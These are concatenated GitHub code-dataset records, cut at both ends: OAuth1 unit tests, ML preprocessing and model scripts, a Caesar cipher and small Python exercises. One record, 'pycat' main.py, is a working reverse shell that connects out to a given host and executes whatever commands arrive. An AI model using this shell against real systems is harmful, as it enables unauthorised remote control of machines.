'oauth_token=foo&oauth_token_secret=bar'\n access_token, access_token_secret = \\\n self.service.get_access_token(request_token,\n request_token_secret)\n self.assertEqual(access_token, 'foo')\n self.assertEqual(access_token_secret, 'bar')\n\n def test_get_access_token_with_json_decoder(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n self.response.content = json.dumps({'oauth_token': 'foo',\n 'oauth_token_secret': 'bar'})\n access_token, access_token_secret = \\\n self.service.get_access_token(request_token,\n request_token_secret,\n decoder=json.loads)\n self.assertEqual(access_token, 'foo')\n self.assertEqual(access_token_secret, 'bar')\n\n def test_request_with_optional_params_oauth_callback(self):\n params = {'oauth_callback': 'http://example.com/callback'}\n r = self.session.request('GET', 'http://example.com/', params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_params_oauth_verifier(self):\n params = {'oauth_verifier': 'foo'}\n r = self.session.request('GET', 'http://example.com/', params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_params_oauth_version(self):\n params = {'oauth_verifier': 'foo'}\n r = self.session.request('GET', 'http://example.com/', params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_params_as_string(self):\n params = 'oauth_callback=http://example.com/callback'\n r = self.session.request('GET', 'http://example.com/', 
params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_data_as_string(self):\n data = 'oauth_callback=http://example.com/callback'\n r = self.session.request('POST', 'http://example.com/', data=data)\n self.assert_ok(r)\n\n def test_request_with_optional_params_with_data(self):\n data = {'oauth_callback': 'http://example.com/callback'}\n r = self.session.request('POST', 'http://example.com/', data=data)\n self.assert_ok(r)\n\n def test_request_with_header_auth(self):\n r = self.session.request('GET',\n 'http://example.com/',\n header_auth=True)\n self.assert_ok(r)\n\n def test_request_with_header_auth_with_realm(self):\n r = self.session.request('GET',\n 'http://example.com/',\n header_auth=True,\n realm='http://example.com/foo/')\n self.assert_ok(r)\n\n def test_get_auth_session(self):\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n s = self.service.get_auth_session('foo', 'bar')\n self.assertIsInstance(s, OAuth1Session)\n\n def test_get_auth_session_with_request_token_response(self):\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n self.service.request_token_response = 'ok'\n s = self.service.get_auth_session('foo', 'bar')\n self.assertEqual(s.request_token_response, 'ok')\n\n def test_pickle_session(self):\n session = pickle.loads(pickle.dumps(self.session))\n\n # Add the fake request back to the session\n session.request = self.fake_request\n r = session.request('GET', 'http://example.com/', header_auth=True)\n self.assert_ok(r)\n","repo_name":"litl/rauth","sub_path":"tests/test_service_oauth1.py","file_name":"test_service_oauth1.py","file_ext":"py","file_size_in_byte":13259,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"31"} +{"seq_id":"14773044976","text":"'''\nTo run this file, two arguments are expected:\n1. sampling: 'no-sample' or 'up-sample' or 'down-sample'\n2. domain: 'restaurant' or 'movie' or 'music' or 'ride'\nCommand Example: python preprocessing.py no-sample restaurant\n\nRead the lines from 55-58 and uncomment the correct line. 
Update the value of train_labels with the value of the train_sentences uncommented\nRun the file with the proper argument depending on the line uncommented\n'''\nimport sys\nimport bz2\nfrom collections import Counter\nimport re\nimport nltk\nimport numpy as np\nimport pandas\nimport pickle\nfrom sklearn.utils import resample\n\ntry:\n sampling = sys.argv[1] # takes values: no-sample | up-sample | down-sample\nexcept:\n print(\"Error Message:\\nArgument expected for sampling: no-sample | up-sample | down-sample\")\n exit()\n\n# domain = sys.argv[2]\n\ndataframe = pandas.read_csv(\"dataset/train.csv\", header=None, names=['sentence', 'sentiment'])\nprint(dataframe)\n\ndf_0 = dataframe[dataframe['sentiment']==0]\ndf_1 = dataframe[dataframe['sentiment']==1]\ndf_2 = dataframe[dataframe['sentiment']==2]\ndf_3 = dataframe[dataframe['sentiment']==3]\ndf_4 = dataframe[dataframe['sentiment']==4]\ndf_5 = dataframe[dataframe['sentiment']==5]\nprint(df_0.shape[0])\nprint(df_1.shape[0])\nprint(df_2.shape[0])\nprint(df_3.shape[0])\nprint(df_4.shape[0])\nprint(df_5.shape[0])\ndf_0 = resample(df_0, replace=True, n_samples=4000)\ndf_1 = resample(df_1, replace=True, n_samples=4000)\ndf_2 = resample(df_2, replace=True, n_samples=4000)\ndf_3 = resample(df_3, replace=True, n_samples=4000)\ndf_4 = resample(df_4, replace=True, n_samples=4000)\ndf_5 = resample(df_5, replace=True, n_samples=4000)\ndataframe = pandas.concat([df_0, df_1, df_2, df_3, df_4, df_5])\n\n# ======================================================================\n\ntrain_size = dataframe.shape[0]\nprint(train_size)\ndataframe = dataframe.sample(frac=1).reset_index(drop=True)\ndataset = dataframe.values\ntrain_sentences = dataset[0:24000,0]\ntrain_labels = dataset[0:24000,1].astype(int)\n\nprint(train_sentences[0])\n\ndataframe = pandas.read_csv(\"dataset/test.csv\", header=None, names=['sentence', 'sentiment'])\ndataframe = dataframe.dropna()\n# if domain == \"movie\":\n# dataframe['sentiment'].replace(['positive', 'negative'], [1, 0], inplace=True)\ndataframe = dataframe.sample(frac=1).reset_index(drop=True)\ndataset = dataframe.values\ntest_sentences = dataset[0:1000,0]\ntest_labels = dataset[0:1000,1].astype(int)\n\nprint(\"Data load completed..\")\n\n# Some simple cleaning of data\nfor i in range(len(train_sentences)):\n train_sentences[i] = re.sub('\\\\d','0',train_sentences[i])\nfor i in range(len(test_sentences)):\n test_sentences[i] = re.sub('\\\\d','0',test_sentences[i])\n\n# Modify URLs to <url>\nfor i in range(len(train_sentences)):\n if 'www.' in train_sentences[i] or 'http:' in train_sentences[i] or 'https:' in train_sentences[i] or '.com' in train_sentences[i]:\n train_sentences[i] = re.sub(r\"([^ ]+(?<=\\\\.[a-z]{3}))\", \"<url>\", train_sentences[i])\n\nfor i in range(len(test_sentences)):\n if 'www.' 
in test_sentences[i] or 'http:' in test_sentences[i] or 'https:' in test_sentences[i] or '.com' in test_sentences[i]:\n test_sentences[i] = re.sub(r\"([^ ]+(?<=\\\\.[a-z]{3}))\", \"<url>\", test_sentences[i])\n\nwords = Counter() # Dictionary that will map a word to the number of times it appeared in all the training sentences\n# wordscount = []\n# max_c = 0\n# min_c = 1000000\nfor i, sentence in enumerate(train_sentences):\n # The sentences will be stored as a list of words/tokens\n train_sentences[i] = []\n sentence = sentence.replace(\"\\\\n\", \" \").replace(\"\\\\\", \"\").replace(\"\\/\", \"\").replace(\"\\\\t\", \" \")\n tokens = nltk.word_tokenize(sentence)\n # max_c = max(max_c, len(tokens))\n # min_c = min(min_c, len(tokens))\n # wordscount.append(len(tokens))\n for word in tokens: # Tokenizing the words\n words.update([word.lower()]) # Converting all the words to lowercase\n train_sentences[i].append(word)\n if i%20000 == 0:\n print(str((i*100)/train_size) + \"% done\")\nprint(\"100% done\")\n# print(\"max_c = \" + str(max_c))\n# print(\"min_c = \" + str(min_c))\n# print(\"average length = \" + str(sum(wordscount)/len(wordscount)))\n\n# Removing the words that only appear once\n# words = {k:v for k,v in words.items() if v>1}\nwords = {k:v for k,v in words.items()}\n\n# Sorting the words according to the number of appearances, with the most common word being first\nwords = sorted(words, key=words.get, reverse=True)\n\n# Adding padding and unknown to our vocabulary so that they will be assigned an index\nwords = ['_PAD','_UNK'] + words\n\n# Dictionaries to store the word to index mappings and vice versa\nword2idx = {o:(i+1) for i,o in enumerate(words)}\nidx2word = {(i+1):o for i,o in enumerate(words)}\n\nfor i, sentence in enumerate(train_sentences):\n # Looking up the mapping dictionary and assigning the index to the respective words\n train_sentences[i] = [word2idx[word] if word in word2idx else 0 for word in sentence]\n\nfor i, sentence in enumerate(test_sentences):\n # For test sentences, we have to tokenize the sentences as well\n test_sentences[i] = [word2idx[word.lower()] if word.lower() in word2idx else 0 for word in nltk.word_tokenize(sentence)]\n\n# Defining a function that either shortens sentences or pads sentences with 0 to a fixed length\ndef pad_input(sentences, seq_len):\n features = np.zeros((len(sentences), seq_len),dtype=int)\n for ii, review in enumerate(sentences):\n if len(review) != 0:\n features[ii, -len(review):] = np.array(review)[:seq_len]\n return features\n\nseq_len = 300 # The length that the sentences will be padded/shortened to\n\ntrain_sentences = pad_input(train_sentences, seq_len)\ntest_sentences = pad_input(test_sentences, seq_len)\n\n# Converting our labels into numpy arrays\ntrain_labels = np.array(train_labels)\ntest_labels = np.array(test_labels)\n\nsplit_frac = 0.5 # 50% validation, 50% test\nsplit_id = int(split_frac * len(test_sentences))\nval_sentences, test_sentences = test_sentences[:split_id], test_sentences[split_id:]\nval_labels, test_labels = test_labels[:split_id], test_labels[split_id:]\n\npickle.dump(train_sentences, open(f'dataset/train_sentences.pkl', 'wb'))\npickle.dump(val_sentences, open(f'dataset/val_sentences.pkl', 'wb'))\npickle.dump(test_sentences, open(f'dataset/test_sentences.pkl', 'wb'))\npickle.dump(train_labels, open(f'dataset/train_labels.pkl', 'wb'))\npickle.dump(val_labels, open(f'dataset/val_labels.pkl', 'wb'))\npickle.dump(test_labels, open(f'dataset/test_labels.pkl', 'wb'))\n\npickle.dump(word2idx, 
open(f'dataset/word2idx.pkl', 'wb'))\npickle.dump(idx2word, open(f'dataset/idx2word.pkl', 'wb'))\n","repo_name":"urmisaha/NewsEmotion","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"177997976","text":"from slicer import Slicer\n\n#My list data\ndata = [\n 200, 1230, 15, 2200, 5550\n]\n#2 is amount to split\ndata_slice = Slicer.cut(data, 2)\nprint(data_slice)\n\n\ndata = [\n {\n \"foodname\": \"Ayam Bakar\",\n \"price\": 12000\n }, \n {\n \"foodname\": \"Jus Mangga\",\n \"price\": 7000\n },\n {\n \"foodname\": \"Mie Goreng\",\n \"price\": 9000\n },\n {\n \"foodname\": \"Chicken Katsu\",\n \"price\": 15000\n },\n]\nprint(Slicer.cut(data, 2))","repo_name":"vkumarsk/pythonSplitData","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6073864571","text":"def check(num):\n if num==2 or num==3:\n return True\n if num==1 or num%2==0 or num%3==0:\n return False\n\n for i in range(3,num,2):\n if num%i==0:\n return False\n\n return True\n\nnum = int(input(\"Enter a number: \"))\n\nif check(num):\n print(\"Prime\")\nelse:\n print(\"Not Prime\")\n","repo_name":"Titan1911/Code-for-HacktoberFest-2021","sub_path":"Beginner/Python/primeOrNot.py","file_name":"primeOrNot.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"2301849815","text":"import os\nimport sys\nimport random\nimport socket\nimport platform\nimport subprocess\n\nos.system('')\n\narg = sys.argv\nBUFFER_SIZE = 1024 * 128\nSEPARATOR = \"<sep>\"\n\nif \"-r\" in arg:\n arg.remove(\"-r\")\n\n if len(arg) <= 1:\n print(\"[\\\033[31mERROR\\\033[0m] Syntax error\\\n$ python main.py -r <ip>:<port>\\\n\")\n else:\n SERVER_HOST = arg[1].split(':')[0]\n SERVER_PORT = int(arg[1].split(':')[1])\n BANNER = random.choice(open(\"D:/Bureau/pycat/banner.txt\", \"r\", encoding=\"utf8\").read().split(\"\\\n\"))\n\n def banner_command(cwd, user=os.getlogin(), OS=platform.system()) -> str:\n return f\"\\\n\\\033[1m\\\033[96m┌──(\\\033[1m\\\033[94m{user}@{OS}\\\033[1m\\\033[96m)-[\\\033[0m\\\033[1m{cwd}\\\033[96m]\\\n\\\033[1m\\\033[96m└─\\\033[1m\\\033[94m$\\\033[0m \"\n\n print(BANNER)\n print(\"[\\\033[34mINFO\\\033[0m] PYCAT by Game K\")\n s = socket.socket()\n s.bind((SERVER_HOST, SERVER_PORT))\n s.listen(5)\n print(f\"[\\\033[33mWAIT\\\033[0m] Listening as {SERVER_HOST}:{SERVER_PORT}\")\n client_socket, client_address = s.accept()\n print(f\"[\\\033[32m OK \\\033[0m] {client_address[0]}:{client_address[1]} Connected\")\n PID = client_socket.recv(BUFFER_SIZE).decode()\n client_socket.send(\"1\".encode(\"utf-8\"))\n cwd = client_socket.recv(BUFFER_SIZE).decode()\n\n while True:\n try:\n command = input(banner_command(cwd))\n if not command.strip():\n continue\n client_socket.send(command.encode(\"utf-8\"))\n if command.lower() == \"exit\":\n break\n output = client_socket.recv(BUFFER_SIZE).decode(\"utf8\")\n results, cwd = output.split(SEPARATOR)\n print(results)\n except Exception as e:\n print(f\"[-] (SERVER) Error shell: {e}\")\n\nelif \"-c\" in arg:\n arg.remove(\"-c\")\n\n if len(arg) <= 1:\n print(\"[\\\033[31mERROR\\\033[0m] Syntax error\\\n$ python main.py -c <ip>:<port>\\\n\")\n else:\n SERVER_HOST = arg[1].split(':')[0]\n SERVER_PORT = int(arg[1].split(':')[1])\n PID = str(os.getpid())\n\n s = 
socket.socket()\n s.connect((SERVER_HOST, SERVER_PORT))\n s.send(PID.encode())\n while s.recv(BUFFER_SIZE).decode() != \"1\": pass\n cwd = os.getcwd()\n s.send(cwd.encode())\n\n while True:\n try:\n command = s.recv(BUFFER_SIZE).decode()\n splited_command = command.split()\n if command.lower() == \"exit\":\n break\n if splited_command[0].lower() == \"cd\":\n try:\n os.chdir(' '.join(splited_command[1:]))\n except FileNotFoundError as e:\n output = str(e)\n else:\n output = \"\"\n else:\n output = subprocess.getoutput(command)\n cwd = os.getcwd()\n message = f\"{output}{SEPARATOR}{cwd}\"\n s.send(message.encode())\n except Exception as e:\n s.send(f\"[-] (CLIENT) Error shell: {e}{SEPARATOR}{cwd}\".encode())\n s.close()\n\nelse:\n print(\"[\\\033[31mERROR\\\033[0m] Syntax error\\\n$ python main.py [-r|-c] <ip>:<port>\\\n\")\n","repo_name":"Game-K-Hack/pycat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41799299960","text":"#!/usr/local/bin/python\n'''\nThis example processes a multi dimensional list and displays only negative numbers.\n\nKey concepts used:\nUses filter() to keep only negative numbers\nUses append() to add elements to a list\nConverts a multi dimensional list to a single dimensional list using sum()\n\n'''\ndef display_neg(n):\n\n if n<0:\n return n\n\n\n\nl2d=[ [0,1,-1],[-4,1,6],[8,1,-1]]\nnegl=[]\nfor row in range(len(l2d)):\n negl.append(list(filter(display_neg,l2d[row])))\nprint (sum(negl, []))\n\n'''\noutput:\n[-1, -4, -1]\n'''\n","repo_name":"humanoid-endhiran/python-basics","sub_path":"list-negative.py","file_name":"list-negative.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70312865689","text":"### Challenge #24: CAESAR CIPHER\n### Published: 12/06/23 | EASY\n\n# Create a program that performs the Caesar cipher on a text and prints it.\n# It must also be able to decrypt the text when we ask it to.\n#\n# I recommend researching how the cipher works in depth. 
\n#Esto también forma parte del reto.\n\nimport random\n\nclass CeaseEncrypt:\n __displacement: int = 0\n __alphabet: list = list('ABCDEFGHIJKLMNÑOPQRSTUVWXYZ')\n __alphabet_encrypted: dict = dict()\n __alphabet_decrypted: dict = dict()\n\n def __init__(self, displacement: int = 0):\n if displacement == 0:\n self.__displacement = self.__get_random_displacement()\n else:\n alphabet_size = len(self.__alphabet)\n self.__displacement = 1 if displacement < 0 else alphabet_size if displacement > alphabet_size else displacement\n self.__encrypt_alphabet()\n\n def __get_random_displacement(self) -> int: \n return random.choice(range(len(self.__alphabet)))\n \n def displacement(self) -> int:\n return self.__displacement\n\n def __encrypt_alphabet(self) -> list():\n self.__alphabet_encrypted = dict()\n self.__alphabet_decrypted = dict()\n alphabet_size = len(self.__alphabet)\n for index in range(alphabet_size):\n new_index = index + self.__displacement\n key = self.__alphabet[index]\n if new_index < alphabet_size:\n value = self.__alphabet[new_index]\n else:\n value = self.__alphabet[new_index-alphabet_size]\n\n self.__alphabet_encrypted[key] = value\n self.__alphabet_decrypted[value] = key\n \n def encrypt(self, text: str) -> str:\n return self.__process(self.__alphabet_encrypted, text)\n\n def decrypt(self, text: str) -> str:\n return self.__process(self.__alphabet_decrypted, text)\n\n def __process(self, alphabet: dict, text: str) -> str:\n result = list()\n for letter in text.upper():\n letter_encrypted = alphabet.get(letter)\n result.append(letter_encrypted if letter_encrypted is not None else letter)\n return \"\".join(result)\n\n\nif __name__ == '__main__':\n print('Reto #24: CIFRADO CÉSAR')\n print('Publicación: 12/06/23 | FÁCIL\\n')\n\n # prueba con un desplazamiento random\n text = \"El mañana nunca muere\"\n ceaseEncrypt = CeaseEncrypt()\n displacement = ceaseEncrypt.displacement()\n text_encrypted = ceaseEncrypt.encrypt(text)\n print(text_encrypted)\n text_decrypted = ceaseEncrypt.decrypt(text_encrypted)\n print(text_decrypted)\n\n print()\n\n # prueba con un desplazamiento especifico\n ceaseEncrypt = CeaseEncrypt(displacement)\n text_encrypted = ceaseEncrypt.encrypt(text)\n print(text_encrypted)\n text_decrypted = ceaseEncrypt.decrypt(text_encrypted)\n print(text_decrypted)\n","repo_name":"gwf-training/python-retos-semanales","sub_path":"src/retos-2023/24-cifrado-cesar.py","file_name":"24-cifrado-cesar.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71421837208","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\nclass BasicBlock(nn.Module):\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=planes, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(planes),\n nn.ReLU()\n )\n\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=planes, out_channels=planes, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(planes)\n )\n\n if stride != 1 or in_planes != planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, planes, kernel_size=1, stride=stride),\n nn.BatchNorm2d(planes)\n )\n else:\n self.shortcut = nn.Sequential()\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.conv2(out)\n # print(out.shape)\n # print(self.shortcut(x).shape)\n out += self.shortcut(x)\n out = F.relu(out)\n 
return out\n\nclass ResNet18(nn.Module):\n def __init__(self):\n block = BasicBlock\n num_block = [2, 2, 2, 2]\n super(ResNet18, self).__init__()\n self.in_planes = 64\n self.conv1 = nn.Conv2d(4, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) # the first layer\n\n self.layer1 = self._make_layer(block, 64, num_block[0], stride=1) # four layers 2-5\n self.layer2 = self._make_layer(block, 128, num_block[1], stride=2) # four layers 6-9\n self.layer3 = self._make_layer(block, 256, num_block[2], stride=2) # four layers 10-13\n self.layer4 = self._make_layer(block, 512, num_block[3], stride=2) # four layers 14-17\n \n self.fc = nn.Linear(512, 10) # the last layer\n\n def _make_layer(self, block, planes, num_blocks, stride): \n layers = []\n for i in range(num_blocks):\n if i == 0:\n layers.append(block(self.in_planes, planes, stride))\n else:\n layers.append(block(planes, planes, 1))\n\n self.in_planes = planes \n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.maxpool(self.relu(self.bn1(self.conv1(x))))\n # print(\"con1\",x.shape)\n x = self.layer1(x)\n # print(\"layer1\",x.shape)\n x = self.layer2(x)\n # print(\"layer2\",x.shape)\n x = self.layer3(x)\n # print(\"layer3\",x.shape)\n x = self.layer4(x)\n # print(\"layer4\",x.shape)\n x = F.avg_pool2d(x,7)\n x = x.view(x.size(0), -1)\n # x = self.fc(x)\n out = x\n return out\n\nif __name__ == \"__main__\":\n # test resnet\n Res = ResNet18()\n img = torch.zeros((224,224,4))\n img = img.unsqueeze(0).permute(0,3,1,2)\n img = Res(img)\n print(img.shape)\n\n","repo_name":"runyuma/RA","sub_path":"agents/Resnet_backup.py","file_name":"Resnet_backup.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8795614637","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# 과일 사진 데이터 로드\nfruits = np.load(\"fruits_300.npy\")\n\nprint(fruits.shape)\nprint(fruits[0, 0, :])\n\n# 0 ~ 255 Grayscale 색상의 100*100 크기의 배열 사진 300개\nplt.imshow(fruits[0], cmap=\"gray_r\")\nplt.show()\n\nfig, axs = plt.subplots(1, 2)\naxs[0].imshow(fruits[100], cmap=\"gray_r\")\naxs[1].imshow(fruits[200], cmap=\"gray_r\")\nplt.show()\n\n# 2차원 배열 형태의 사진 데이터를 1차원 배열 형태로 전환\napple = fruits[:100].reshape(-1, 100 * 100)\npineapple = fruits[100:200].reshape(-1, 100 * 100)\nbanana = fruits[200:300].reshape(-1, 100 * 100)\n\nprint(apple.shape)\nprint(apple.mean(axis=1))\n\n# 데이터 분류 별 픽셀 색상 데이터 평균 히스토그램\nplt.hist(np.mean(apple, axis=1), alpha=0.8)\nplt.hist(np.mean(pineapple, axis=1), alpha=0.8)\nplt.hist(np.mean(banana, axis=1), alpha=0.8)\nplt.legend([\"apple\", \"pineapple\", \"banana\"])\nplt.show()\n\nfig, axs = plt.subplots(1, 3, figsize=(20, 5))\naxs[0].bar(range(10000), np.mean(apple, axis=0))\naxs[1].bar(range(10000), np.mean(pineapple, axis=0))\naxs[2].bar(range(10000), np.mean(banana, axis=0))\nplt.show()\n\n# 각 분류 별 100장의 픽셀 각각의 평균값을 가지는 이미지\napple_mean = np.mean(apple, axis=0).reshape(100, 100)\npineapple_mean = np.mean(pineapple, axis=0).reshape(100, 100)\nbanana_mean = np.mean(banana, axis=0).reshape(100, 100)\n\nfig, axs = plt.subplots(1, 3, figsize=(20, 5))\naxs[0].imshow(apple_mean, cmap=\"gray_r\")\naxs[1].imshow(pineapple_mean, cmap=\"gray_r\")\naxs[2].imshow(banana_mean, cmap=\"gray_r\")\nplt.show()\n\n# 각 분류 별 클래스의 평균값과 가까운 값을 가지는 사진 선택 (사과의 경우)\nabs_diff = np.abs(fruits - apple_mean)\nabs_mean = np.mean(abs_diff, 
axis=(1, 2))\nprint(abs_mean.shape)\n\napple_index = np.argsort(abs_mean)[:100]\nfig, axs = plt.subplots(10, 10, figsize=(10, 10))\n\nfor i in range(10):\n for j in range(10):\n axs[i, j].imshow(fruits[apple_index[i * 10 + j]], cmap=\"gray_r\")\n axs[i, j].axis(\"off\")\n\nplt.show()\n","repo_name":"JaeyoonCheon/MLDL-training","sub_path":"6-1.Clustering.py","file_name":"6-1.Clustering.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"406774406","text":"import torch\nfrom torch.utils.data import DataLoader\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom dann_model import DANN\nfrom dann_dataset import DannDataset\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\n\nsource = sys.argv[1]\ntarget = ''\nif source == 'mnistm':\n target = 'svhn'\nelif source == 'usps':\n target = 'mnistm'\nelif source == 'svhn':\n target = 'usps'\n\nfile_root = '../hw3_data/digits'\n\nmodel = DANN()\nif target == 'mnistm':\n model.load_state_dict(torch.load('../models/usps_mnistm.pth', map_location='cpu'))\nelif target == 'usps':\n model.load_state_dict(torch.load('../models/svhn_usps.pth', map_location='cpu'))\nelif target == 'svhn':\n model.load_state_dict(torch.load('../models/mnistm_svhn.pth', map_location='cpu'))\n\n#source_dataset = DannDataset(root=file_root, dataset=source, train=False)\n#source_loader = DataLoader(source_dataset, batch_size=200, shuffle=False, num_workers=1)\ntarget_dataset = DannDataset(root=file_root, dataset=target, train=False)\ntarget_loader = DataLoader(target_dataset, batch_size=200, shuffle=False, num_workers=1)\n\nmodel.eval()\nfeature_extracter = model.feature\nfc = model.class_classifier\nn_correct = 0\nwith torch.no_grad():\n for _, (t_img, t_label) in enumerate(target_loader):\n t_img, t_label = t_img, t_label\n f = feature_extracter(t_img).view(-1, 48*4*4)\n class_output = fc(f)\n pred = torch.max(class_output.data, 1)\n n_correct += (pred[1] == t_label).sum().item()\n\naccu = float(n_correct) / len(target_loader.dataset) * 100\nprint(accu)\n\n\n\noutput = np.empty(shape=[0, 48*4*4])\nclass_label = np.empty(shape=[0, 1])\n'''\nfor _, (t_img, t_label) in enumerate(source_loader):\n f = feature_extracter(t_img).view(-1, 48*4*4)\n f = np.array(f.detach())\n output = np.append(output, f, axis=0)\n t_label = np.array(t_label)\n t_label = t_label.astype(int)\n class_label = np.append(class_label, t_label)\n\nn_correct = 0\nfor _, (t_img, t_label) in enumerate(target_loader):\n f = feature_extracter(t_img).view(-1, 48*4*4)\n f = np.array(f.detach())\n output = np.append(output, f, axis=0)\n t_label = np.array(t_label)\n t_label = t_label.astype(int)\n class_label = np.append(class_label, t_label)\n\n\ndomain_label = np.zeros((len(source_loader.dataset)))\ndomain_label = np.append(domain_label, np.ones((len(target_loader.dataset))))\ndomain_label = domain_label.astype(int)\n\ntsne = TSNE(n_components=2, random_state=0)\nX_2d = tsne.fit_transform(output)\n\n\ntarget_names = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ntarget_ids = range(len(target_names))\n\nplt.figure(figsize=(6, 5))\ncolors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'grey', 'orange', 'purple']\nfor i, c, label in zip(target_ids, colors, target_names):\n plt.scatter(X_2d[class_label == i, 0], X_2d[class_label == i, 1], c=c, label=label)\nplt.legend()\nprint('done')\nplt.show()\n\ntarget_names = np.array(['source domain', 'target domain'])\ntarget_ids = 
range(len(target_names))\n\nplt.figure(figsize=(6, 5))\ncolors = ['r', 'b']\nfor i, c, label in zip(target_ids, colors, target_names):\n plt.scatter(X_2d[domain_label == i, 0], X_2d[domain_label == i, 1], c=c, label=label)\nplt.legend()\nprint('done')\nplt.show()\n'''\n'''\nfrom sklearn import datasets\ndigits = datasets.load_digits()\n# Take the first 500 data points: it's hard to see 1500 points\nX = digits.data[:10]\ny = digits.target[:10]\n\n############################################################\n# Fit and transform with a TSNE\nfrom sklearn.manifold import TSNE\ntsne = TSNE(n_components=2, random_state=0)\n\n############################################################\n# Project the data in 2D\nX_2d = tsne.fit_transform(X)\n\n############################################################\n# Visualize the data\ntarget_ids = range(len(digits.target_names))\nprint(type(digits.target_names))\n\nfrom matplotlib import pyplot as plt\nplt.figure(figsize=(6, 5))\ncolors = 'r', 'g', 'b', 'c', 'm', 'y', 'k', 'w', 'orange', 'purple'\nfor i, c, label in zip(target_ids, colors, digits.target_names):\n plt.scatter(X_2d[y == i, 0], X_2d[y == i, 1], c=c, label=label)\nplt.legend()\nplt.show()\n\n'''","repo_name":"kkeen699/DLCV-spring2019","sub_path":"hw3/DANN/t-SNE.py","file_name":"t-SNE.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28010561880","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QPropertyAnimation\nfrom .menu_klient import Menu_klient\nfrom .menu_lotniska import Ui_dodawani_lotniska\nfrom .menu_samoloty import menu_samoloty\nfrom .menu_trasy import Ui_menu_trasy\nfrom .menu_loty import Ui_menuloty\nfrom .menu_rezerwacja import menu_rezerwacja\nfrom .menu_usuwanie import Ui_usuwanie\nfrom .info_zapis import Ui_Dialog_2\nfrom .info_odczyt import Ui_Dialog\n\n\n\nclass Ui_System_rezerwacji_biletow(object):\n def __init__(self,system):\n self.system=system\n def setupUi(self, System_rezerwacji_biletow):\n System_rezerwacji_biletow.setObjectName(\"System_rezerwacji_biletow\")\n System_rezerwacji_biletow.resize(1200, 600)\n\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"modules/ikony/plane.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n System_rezerwacji_biletow.setWindowIcon(icon)\n\n System_rezerwacji_biletow.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.glowny = QtWidgets.QWidget(System_rezerwacji_biletow)\n self.glowny.setMinimumSize(QtCore.QSize(800, 600))\n self.glowny.setObjectName(\"glowny\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.glowny)\n self.horizontalLayout.setContentsMargins(2, 2, 2, 2)\n self.horizontalLayout.setSpacing(0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n\n\n\n self.lewa_ramka = QtWidgets.QFrame(self.glowny)\n self.lewa_ramka.setMaximumSize(QtCore.QSize(400, 16777215))\n self.lewa_ramka.setMinimumSize(QtCore.QSize(400,0))\n self.lewa_ramka.setStyleSheet(\"background-color: rgb(83, 83, 83);border-radius:5px;\")\n self.lewa_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lewa_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lewa_ramka.setObjectName(\"lewa_ramka\")\n\n\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self.lewa_ramka)\n self.verticalLayout.setContentsMargins(5, 5, 5, 5)\n self.verticalLayout.setSpacing(2)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n\n self.lewo_gora_ramka = QtWidgets.QFrame(self.lewa_ramka)\n 
